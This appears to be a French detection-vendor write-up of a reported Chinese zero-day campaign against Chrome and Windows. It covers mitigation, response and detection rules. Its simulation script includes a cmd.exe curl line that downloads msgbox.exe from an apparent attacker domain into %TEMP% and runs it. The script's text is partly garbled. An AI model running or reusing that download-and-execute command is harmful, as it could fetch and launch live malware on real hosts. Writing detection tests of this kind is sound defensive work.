Les Acteurs de la Menace Chinois enchaînent les Zero-Days de Navigateur et de Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Deux acteurs malveillants chinois, UTA0560 et JungleBamboo, utilisent une chaîne d’exploitation sophistiquée en plusieurs étapes ciblant Google Chrome et le noyau Windows. Les attaques profitent d’une fenêtre « patch-gap » où les vulnérabilités sont corrigées dans Chromium avant que les mises à jour correspondantes n’atteignent les versions publiées de Google Chrome. Des appâts de hameçonnage ciblé livrent différentes charges utiles, y compris la porte dérobée JScript GRIMWEDGE et l’extension Chrome LONGTALE.
Enquête
La surveillance de la sécurité réseau de Volexity a identifié une campagne de hameçonnage ciblée contre des ONG le 1er septembre 2026. L’enquête a révélé une chaîne d’exploitation partagée impliquant CVE-2026-85046, CVE-2026-87491 et CVE-2026-85880. Les analystes ont séparé l’activité en deux groupes : UTA0560 déployant GRIMWEDGE et JungleBamboo utilisant SUPERSTOMP pour installer l’extension LONGTALE.
Atténuation
Les organisations doivent maintenir Google Chrome à jour avec la dernière version disponible pour réduire l’exposition pendant les périodes de « patch-gap ». Les équipes de sécurité doivent surveiller les comportements inhabituels des sous-processus Chrome et les installations non autorisées d’extensions Chrome. Un filtrage fort des e-mails pour les appâts de hameçonnage ciblé et une surveillance de la création de tâches planifiées suspectes ou non autorisées sont également recommandés.
Réponse
Si une exploitation est détectée, les hôtes affectés doivent être isolés immédiatement pour empêcher toute communication de commande et contrôle ou tout mouvement latéral. Les intervenants doivent effectuer une analyse de la mémoire sur les processus Chrome pour identifier le code injecté. Les extensions Chrome installées doivent également être vérifiées, et les tâches planifiées doivent être examinées pour détecter des entrées suspectes telles que Système de tâches planifiées Windows.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
Utilisation suspecte de CURL (via cmdline)
Commande suspecte et contrôle par demande DNS de domaine de premier niveau (TLD) inhabituel (via dns)
Tâche planifiée suspecte (via audit)
IOCs (HashSha256) à détecter : Attention au « Patch Gap » : Plusieurs acteurs malveillants chinois enchaînent des exploits 0-day dans Chrome & Windows
IOCs (SourceIP) à détecter : Attention au « Patch Gap » : Plusieurs acteurs malveillants chinois enchaînent des exploits 0-day dans Chrome & Windows
IOCs (DestinationIP) à détecter : Attention au « Patch Gap » : Plusieurs acteurs malveillants chinois enchaînent des exploits 0-day dans Chrome & Windows
Pages de destination de la chaîne d’exploits Zero-Day de Chrome [Serveur Web]
Détection de l’activité de livraison de la porte dérobée GRIMWEDGE JScript et des charges utiles [Création de processus Windows]
Exécution de la simulation
-
Narratif & commandes de l’attaque : L’adversaire cherche à établir un point d’appui sur le système compromis en déployant la porte dérobée JScript GRIMWEDGE. Pour éviter la détection par un AV basé sur des signatures simples, l’attaquant utilise
cmd.exeet l’outil natifcurlpour télécharger un chargeur de la deuxième étape nommémsgbox.exedepuis une infrastructure de commande et contrôle (C2) distante. Une fois le téléchargement terminé, l’attaquant exécute immédiatement la charge utile à partir du répertoire%TEMP%pour minimiser le temps pendant lequel le fichier reste sur le disque et pour tirer parti d’un répertoire souvent négligé par la surveillance de base. Cette séquence est conçue pour correspondre au modèle spécifique de ligne de commande que la règle de détection recherche. -
Script de test de régression :
# Script de simulation pour déclencher la règle de détection GRIMWEDGE. # Ce script crée un fichier factice pour simuler la charge utile téléchargée. $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. Créer un 'msgbox.exe' factice pour simuler la charge utile téléchargée # Dans une véritable attaque, ce serait le binaire malveillant réel. New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "Contenu factice de la charge utile" # 2. Exécuter la chaîne de commande exacte identifiée dans la logique de détection. # Note : Nous utilisons une approche d'écho/marquage local pour l'URL afin de garantir que la chaîne de commande correspond exactement. cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host « Simulation terminée. Vérifiez SIEM pour les alertes correspondant au modèle GRIMWEDGE." -
Commandes de nettoyage :
# Script de nettoyage pour supprimer la charge utile simulée et les fichiers. $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "Nettoyage réussi : $payloadPath supprimé." } else { Write-Host "Charge utile non trouvée. Nettoyage inutile." }